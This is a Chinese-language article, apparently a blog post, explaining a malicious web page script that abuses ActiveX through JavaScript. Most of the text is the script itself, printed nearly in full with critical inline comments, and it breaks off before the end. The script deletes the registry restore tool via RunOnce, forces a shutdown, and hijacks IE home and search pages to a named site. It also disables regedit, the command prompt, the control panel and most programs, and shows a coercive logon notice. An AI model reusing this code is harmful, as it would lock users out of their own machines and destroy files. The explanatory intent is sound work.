最近一段時間網頁惡意代碼對本地注冊表的修改可以說是鬧得沸沸揚揚，從改IE標題開始到改首頁，甚至還發展到鎖定INTERNET選項和注冊表編輯器阻止用戶恢復自己的IE！真是愈來愈嚴重了。開始改標題的時候只不過像小孩子跑到別人家的大門上用粉筆涂上“XX到此一游”，到后來就變質成了強盜要霸占整個家園。本來也許站長的原意是希望自己站點的訪問量能高一些，不過很遺憾用錯了方法，上過當的網民再也不會到他的站點去了。好了，廢話少說，我們來看一下這究竟是怎么回事。 
其實這些都是利用了ACTIVE和JS做到的，我們來看這段危險代碼。如果瀏覽了這個網頁的話IE跟系統都會被修改得不象樣，僅僅可以使用WINDOWS的基本程序。夠狠的了。 
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>"); 

//this function is only needed if you add favorites or links 
function AddFavLnk(loc, DispName, SiteURL) 
{ 
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL"); 
Shor.TargetPath = SiteURL; 
Shor.Save(); 
} 
//end add favorites or links function 

function f(){ 
try 
{ 
//ActiveX initialization （這里初始化ACTIVEX，為修改瀏覽者的注冊表做準備。） 
a1=document.applets[0]; 
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Shl = a1.GetObject(); 
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}"); 
a1.createInstance(); 
FSO = a1.GetObject(); 
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}"); 
a1.createInstance(); 
Net = a1.GetObject(); 

try 
{ 
//set home page 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\deltree.exe","start.exe /m deltree /y c:\\windows\\Command\\Scanreg.exe /q /u /autorun");（注意這里，Scanreg.exe被刪除！這樣就阻撓了瀏覽者通過恢復瀏覽之前的注冊表來修復系統！想想這意味著什么？它既然可以不經過同意而刪除機器中的文件，那么也可以做別的事情。包括：在沒有通知的情況下格式化硬盤！） 
從這里開始把IE的標題，首頁，搜索頁等等改得一塌糊涂，親眼見到的話你一定忍不住想問：這是天天陪著我到處閑逛的IE嗎？：） 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\rundll.exe","rundll.exe user.exe,exitwindows"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Toolbar\\backbitmapie5","c:\\Windows\\web\\wvleft.bmp"); 
Shl.RegWrite ("HKCR\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\", "安全測試網"); 
Shl.RegWrite ("HKCU\\Software\\Classes\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\", "安全測試網"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "= 　　　　★ 安全測試網★---<<測出你的系統上網極不安全，恢復后請將IE安全級別設為高>>"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "= 　　　　★ 安全測試網★---<<測出你的系統上網極不安全，恢復后請將IE安全級別設為高>>"); 
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\SearchPage","http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKCR\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\", "http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2","http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Page_URL","http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Local Page","http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page","http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Default_Search_URL","http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKLM\\Software\\CLASSES\\CLSID\\{01E04581-4EEE-11d0-BFE9-00AA005B4383}\\InProcServer32\\","rem C:\\WINDOWS\\sys tem\\BROWSEUI.DLL"); 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskBar", "1","REG_DWORD");（開始菜單中的"設置\任務欄和開始菜單"命令被禁止） 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind","1","REG_DWORD");（"查找"命令被禁止） 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFolderOptions","1","REG_DWORD");（禁止IE顯示“工具”中“INTERNET選項”） 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoViewContextMenu","1","REG_DWORD");（禁止使用鼠標右鍵。搞什么啊，這樣都禁止？：（） 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun","1","REG_DWORD");（禁用開始菜單的"運行". ） 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disablecmd","1","REG_DWORD");（禁止運行命令解釋器） 
Shl.RegWrite 
("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode","1","REG_DWORD");（讓操作系統無法切換至DOS實模式） 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "問候");（開機即跳出對話框。像個幽靈一般如影隨形。） 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText","朋友:非常感謝你訪問過我們的網站<http://user.netomia.com/wjkplx/>經測試你的電腦存在嚴重的漏洞隱患，你的電腦已被設置了一些障礙，只能運行一少部份程序。請點擊桌面上的【安全測試網】快捷鍵上我們的網站去恢復，點擊秘密特區鏈接，按提示做即可。或者點擊下載解鎖程序。"); 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu","1","REG_DWORD");（禁止IE的右鍵菜單功能） 
Shl.RegWrite ("HKLM\\Software\\CLASSES\\.reg\\","txtfile");（禁止使用reg文件。想要通過編輯REG文件解除鎖定不行了。：（黑心的站長啊，我反正是很想PK他，不知道你怎么想？） 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\sys tem\\DisableRegistryTools","1","REG_DWORD");（禁止使用注冊表程序regedit.exe） 
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetFolders","1","REG_DWORD");（禁用“控制面板”。怎么感覺這個站長是開網吧的？呵呵） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserContextMenu","1","REG_DWORD");（禁止IE的右鍵菜單功能。生怕別人看他的源碼） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserOptions","1","REG_DWORD");（禁止Internet選項） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoBrowserSaveAs","1","REG_DWORD");（禁用“另存為……”） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoFileOpen","1","REG_DWORD");（禁止“文件”菜單下面的“打開”功能） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoTheaterMode","1","REG_DWORD");（禁止全屏模式對IE控制面板的控制） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Advanced","1","REG_DWORD");（禁止更改高級頁設置 ） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Cache Internet","1","REG_DWORD");（禁止更改臨時文件的設置） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\AutoConfig","1","REG_DWORD");（禁止更改自動配置的設置） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage","1","REG_DWORD");（禁止更改主頁設置） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\History","1","REG_DWORD");（禁止更改歷史紀錄設置） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Connwiz Admin Lock","1","REG_DWORD");（禁止Internet連接向導） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Check_If_Default","1","REG_DWORD");（禁止更改默認瀏覽器檢查） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\ContentTab","1","REG_DWORD");（禁止內容項） 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\AboutURLs\\安全測試網","http://user.netomia.com/wjkplx/"); 
Shl.RegWrite ("HKLM\\Software\\Microsoft\\Internet Explorer\\AboutURLs\\blank","http://user.netomia.com/wjkplx/");（IE如果有一點地方沒有他網站的影子他就睡不著覺？） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\SecurityTab","1","REG_DWORD");（禁止安全項） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\ResetWebSettings","1","REG_DWORD");（禁止“重置Web設置”功能） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Restrictions\\NoViewSource","1","REG_DWORD");（禁止“源文件”。美其名曰“保護知識產權”。） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Infodelivery\\Restrictions\\NoAddingSubScriptions","1","REG_DWORD");（禁止添加脫機頁計劃） 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu","1","REG_DWORD");（禁止“資源管理器”中的“文件”菜單） 
Shl.RegWrite ("HKCU\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\Settings","1","REG_DWORD");（禁止更改連接設置） 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun","1","REG_DWORD");（禁止使用任何程序！真是陰險，站長肯定是怕偶們不會用計算機給弄壞了所以幫忙鎖起來。不過下面還是開放了幾個基本程序供使用的：Iexplore.exe，ACDSee32.exe等。看看下面的程序名就知道你能用什么程序了。） 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\Iexplore.exe","Iexplore.exe"); 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\WINWORD.EXE","WINWORD.EXE"); 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\EXCEL.EXE","EXCEL.EXE"); 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\WINZIP32.EXE","WINZIP32.EXE"); 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\ACDSee32.exe","ACDSee32.exe"); 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\photoshop.exe","photoshop.exe"); 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\Notepad.exe","Notepad.exe"); 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\Wordpad.exe","Wordpad.exe"); 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\deltree.exe","deltree.exe"); 
Shl.RegWrite ("HKCU\\SoftWare\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RestrictRun\\rundll.exe","rundll.exe"); 
//end set home page 

//add favorites this is the common part; should be here if you want to add favorites 
var WF, Shor, loc; 
WF = FSO.GetSpecialFolder(0); 
loc = WF + "\\Favorites"; 
if(!FSO.FolderExists(loc)) 
{ 
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites"; 
if(!FSO.FolderExists(loc)) 
{ 
return; 
} 
} 
//end common part 

//the following line is used for adding favorites.